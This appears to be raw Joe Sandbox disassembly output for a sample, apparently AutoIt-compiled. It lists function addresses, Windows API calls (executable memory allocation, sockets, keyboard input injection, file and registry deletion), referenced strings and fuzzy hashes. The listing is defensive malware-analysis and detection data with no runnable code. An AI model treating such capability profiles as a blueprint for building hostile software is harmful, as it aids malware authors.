Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __calloc_crt
String ID: i$@Bj
API String ID: 3494438863-3936459638
Opcode ID: 0bd1385228a9b3a048b3c4eaa3a198d9967fea0e318e42fb34fb426d33ef4897
Instruction ID: 601c9de11bee937d033ed701ede808bdcd2cc550a5f37ef4cd1941726e3a7831
Opcode Fuzzy Hash: 0bd1385228a9b3a048b3c4eaa3a198d9967fea0e318e42fb34fb426d33ef4897
Instruction Fuzzy Hash: 85F044B12846129FE76CEF58FC51B9737A7E711730B50041AF106CF6D0EB7099618AD4

Function 00609B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00609B94

Part of subcall function 00609C0B: __mtinitlocknum.LIBCMT ref: 00609C1D
Part of subcall function 00609C0B: EnterCriticalSection.KERNEL32(00000000,?,00609A7C,0000000D), ref: 00609C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00609BA4

Part of subcall function 00609100: ___addlocaleref.LIBCMT ref: 0060911C
Part of subcall function 00609100: ___removelocaleref.LIBCMT ref: 00609127
Part of subcall function 00609100: ___freetlocinfo.LIBCMT ref: 0060913B

Strings

8i, xrefs: 00609B8A, 00609B9F, 00609BAB
8i, xrefs: 00609B85

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8i$8i
API String ID: 547918592-3551583592
Opcode ID: 8073265464af37ebc9a1c3903543e7aa248dc377fa3c3a067e1c03cc133e98ad
Instruction ID: 67d705c9916d617a87e64b47044b0c8c84e7ebafa3260f507c8812eeeded502e
Opcode Fuzzy Hash: 8073265464af37ebc9a1c3903543e7aa248dc377fa3c3a067e1c03cc133e98ad
Instruction Fuzzy Hash: 99E086719C3300ABEF98FBA86A03B4B365B5B40731F20315EF095564C6CEB10400856F

Function 005E4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005E4BD0,?,005E4DEF,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E4C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 005E4C1D
kernel32.dll, xrefs: 005E4C0C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: a30a2bf9ae0c4853cd9a5ab2108090eb306e04eac051ba83a336ef98c3f5adc2
Instruction ID: b71eb036100a2528b4de6e61c3e95c469bf16fca148e6d0c094a4b525faf9bde
Opcode Fuzzy Hash: a30a2bf9ae0c4853cd9a5ab2108090eb306e04eac051ba83a336ef98c3f5adc2
Instruction Fuzzy Hash: 1AD01230511B13CFD7209F71E908606BAD6FF09391B129C39E4C6D7550E6B0D880CB50

Function 005E4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005E4B83,?), ref: 005E4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E4C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 005E4C50
kernel32.dll, xrefs: 005E4C3F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: aebd7ae5d4948f11b5946f4d06cfa75c13819d6ac1f9000b1ab46d09b308f791
Instruction ID: 114e45e4fddf535fd10c1a98b710489f0e37d1f4349a5acc9a87b06e4428e511
Opcode Fuzzy Hash: aebd7ae5d4948f11b5946f4d06cfa75c13819d6ac1f9000b1ab46d09b308f791
Instruction Fuzzy Hash: C5D01230510753CFD7249F32E908616B6D6BF05391B229839D4D6D7560E6B4D880CA50

Function 00660DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00661039), ref: 00660DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00660E07

Strings

RegDeleteKeyExW, xrefs: 00660E01
advapi32.dll, xrefs: 00660DF0

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: bf6c6b8699c2bdbfd8e19d19e44882c02eae46f9074b0377a228224119588227
Instruction ID: aa7e89642d6cc613c88689495377472c22c93d01a69eedd8e3b91dfe0f8e5803
Opcode Fuzzy Hash: bf6c6b8699c2bdbfd8e19d19e44882c02eae46f9074b0377a228224119588227
Instruction Fuzzy Hash: 80D01270510722CFE7205F75D808687B6EBAF05391F129C7DD485D2650D6B1D4A0C660

Function 006590E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00658CF4,?,0066F910), ref: 006590EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00659100

Strings

GetModuleHandleExW, xrefs: 006590FA
kernel32.dll, xrefs: 006590E9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 006bc791a015700b6958bc853ae0dc4a036acd92238307a0d6dc8985e68ac608
Instruction ID: 32ed388099bbbe3cf48471dfbfc4d704a3b159a29260c1ad67781605336545b0
Opcode Fuzzy Hash: 006bc791a015700b6958bc853ae0dc4a036acd92238307a0d6dc8985e68ac608
Instruction Fuzzy Hash: A1D01234510723CFDB209F31E818546B6D6AF06392F12983AD886D6650EBB0C484C660

Function 00621714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00621718
__swprintf.LIBCMT ref: 00621749

Strings

WIN_XPe, xrefs: 00621788
%.3d, xrefs: 00621723

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: b4a9c6e71f5e86dcb35d0e8f1571be485d2c581854b6c20545587e2946591f81
Instruction ID: 8853311a732d7e6695db8d3aa4af21f0d96acd6dbfadcdb7b29071c4241279bc
Opcode Fuzzy Hash: b4a9c6e71f5e86dcb35d0e8f1571be485d2c581854b6c20545587e2946591f81
Instruction Fuzzy Hash: 5FD0127185C528EACB149B90A8888BA777EF76A301F100463F4029A040E2218756EE25

Function 0063717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2288092cf3532fc00a03c446cded5f8ed2eeb344e9be968d3b01ea3148ae462a
Instruction ID: 681433836b961f230d3b4d5af8095ef15d2206fc48636c0f220a4fd1d379dd34
Opcode Fuzzy Hash: 2288092cf3532fc00a03c446cded5f8ed2eeb344e9be968d3b01ea3148ae462a
Instruction Fuzzy Hash: A2C11CB5A04216EFDB24CF94C884AAEBBF6FF48714F158598E805EB251D730ED41DB90

Function 0065E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0065E0BE
CharLowerBuffW.USER32(?,?), ref: 0065E101

Part of subcall function 0065D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0065D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0065E301
_memmove.LIBCMT ref: 0065E314

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: a0ef3a6920ccc26f73b04e76e0812f2f30690e836065a5d331497361a3bfc6d6
Instruction ID: d7839a8144d624e6413416e803daf57018d75f5b238a338948e9b0be3f5b43a6
Opcode Fuzzy Hash: a0ef3a6920ccc26f73b04e76e0812f2f30690e836065a5d331497361a3bfc6d6
Instruction Fuzzy Hash: FEC15B716083419FCB18DF28C480A6ABBE5FF89714F14896DF899DB351D731EA4ACB81

Function 00658093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006580C3
CoUninitialize.OLE32 ref: 006580CE

Part of subcall function 0063D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0063D5D4

VariantInit.OLEAUT32(?), ref: 006580D9
VariantClear.OLEAUT32(?), ref: 006583AA

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 85a12bc01e78a7192551b4622fe5715d5e400186bf8be0a83356cf550cf61146
Instruction ID: 5dbde83a44248fda367d855c5b73be9a2415b0b1e574e5dca28653e3c2dbcca8
Opcode Fuzzy Hash: 85a12bc01e78a7192551b4622fe5715d5e400186bf8be0a83356cf550cf61146
Instruction Fuzzy Hash: D2A18C752047429FCB14DF55C885B2ABBE6BF89314F04445CF996AB7A2CB30ED05CB82

Function 0063687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0063688E
SysAllocString.OLEAUT32(00000000), ref: 00636937
VariantCopy.OLEAUT32 ref: 00636966
VariantClear.OLEAUT32(?), ref: 0063698D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 7ec1071082533c3699ef599c8c96ff1d8bdf928fa21e939c2e89f6859b39d52d
Instruction ID: 1741c4e53a2851656ab0a266de4f1bc563eda765a238a07eb60c08dbc069487c
Opcode Fuzzy Hash: 7ec1071082533c3699ef599c8c96ff1d8bdf928fa21e939c2e89f6859b39d52d
Instruction Fuzzy Hash: CF51F074704302BADB24AF65D895B6AF7EBAF44310F20D81FF586EB291DB70D8818794

Function 006697F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00F5E188,?), ref: 00669863
ScreenToClient.USER32(00000002,00000002), ref: 00669896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00669903

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: e251d9c2bd0ebdecb3f6bd36e37cbdc4c51b1f917d5c130cfe330883e9389233
Instruction ID: bad7fc5dcce2e0b8d54e21c2457a2d393c979a76e9e0343a54ab08ffc8ac57c2
Opcode Fuzzy Hash: e251d9c2bd0ebdecb3f6bd36e37cbdc4c51b1f917d5c130cfe330883e9389233
Instruction Fuzzy Hash: FB514D34A00209AFCB14DF14D984AEE7BBAFF46360F14865DF8659B3A0D731AD41CBA0

Function 00639A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00639AD2
__itow.LIBCMT ref: 00639B03

Part of subcall function 00639D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00639DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00639B6C
__itow.LIBCMT ref: 00639BC3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: dea51fb60b1278188be7e1b3b76eaeb7df57ab13702c85cefd5b214fe2c570f5
Instruction ID: fdb3dd9a3b37ef298c27cc0d09a4f3b661d17396bc096e811acdb5cd9468ce13
Opcode Fuzzy Hash: dea51fb60b1278188be7e1b3b76eaeb7df57ab13702c85cefd5b214fe2c570f5
Instruction Fuzzy Hash: 4C419370A0024DABDF15DF55D849BEEBFBAEF88750F000059F94AA7291DBB09D44CBA1

Function 006569AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 006569D1
WSAGetLastError.WSOCK32(00000000), ref: 006569E1

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00656A45
WSAGetLastError.WSOCK32(00000000), ref: 00656A51

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 87c57ededcd20813c2972eaa205d834bf3e9a932e572a76efc1c15178195b837
Instruction ID: 2c1f386566b53c94a6f2c90c2180ff8ded3ca5fd11babe14642b7c68f98aa14b
Opcode Fuzzy Hash: 87c57ededcd20813c2972eaa205d834bf3e9a932e572a76efc1c15178195b837
Instruction Fuzzy Hash: 4C41C4747002016FEB64AF25DC8AF797BA5AF44B10F44802CFA999F3D2DAB09D008791

Function 0065641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0066F910), ref: 006564A7
_strlen.LIBCMT ref: 006564D9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 20619031c7aaad5a5204aa951a765cdbaf4405af2b4834f961aaf087caf0a281
Instruction ID: aa83e037b622341555d3d6a76eec781144a1cdd725cb5bdcf849ce18ab128a24
Opcode Fuzzy Hash: 20619031c7aaad5a5204aa951a765cdbaf4405af2b4834f961aaf087caf0a281
Instruction Fuzzy Hash: EC41E631600105AFCB18EBA5EC89FEEB7BABF54310F508169FD1597292EB30AD04C754

Function 0064B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0064B89E
GetLastError.KERNEL32(?,00000000), ref: 0064B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0064B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0064B915

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 88d124578d2b7da922ab2a999d6952b0d31c6e5d3a9d468f3481508da9f34158
Instruction ID: b631d9b7cc136888d5b61c6f5044861f11bd61092c14adf26e46b5963b4e57e4
Opcode Fuzzy Hash: 88d124578d2b7da922ab2a999d6952b0d31c6e5d3a9d468f3481508da9f34158
Instruction Fuzzy Hash: 83412C35600551DFCB14EF15C489A59BBE6FF8A310F098098ED8A9B762CB30FD01CB91

Function 00668851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006688DE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: b34e4a22e22092d5d692e246606d487a4b5aba4880e92f3efeefc94ebb15342e
Instruction ID: 0cde62f1a6f994bc85e2de75255579aabdee41df8097850bfdc2ad90eeff9f9b
Opcode Fuzzy Hash: b34e4a22e22092d5d692e246606d487a4b5aba4880e92f3efeefc94ebb15342e
Instruction Fuzzy Hash: 08319034600108BEEB249B78DC49BFC7BA7EB06310F544716FA56E72A1CA70ED409B92

Function 0066AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0066AB60
GetWindowRect.USER32(?,?), ref: 0066ABD6
PtInRect.USER32(?,?,0066C014), ref: 0066ABE6
MessageBeep.USER32(00000000), ref: 0066AC57

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: a13eaf50231c3b5ef61b240df4242177b3e7ebf49689b9beba986d1b3c00da59
Instruction ID: f78a05d7e8f4721ae8df5050a34b25b282f358d26d5ac1bc622f16c345a46274
Opcode Fuzzy Hash: a13eaf50231c3b5ef61b240df4242177b3e7ebf49689b9beba986d1b3c00da59
Instruction Fuzzy Hash: 0D414A30600219DFCB11DF98D894AA9BBF7FF49710F1891A9E815AB361D730A941CF92

Function 00640AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00640B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00640B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00640BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00640BFB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

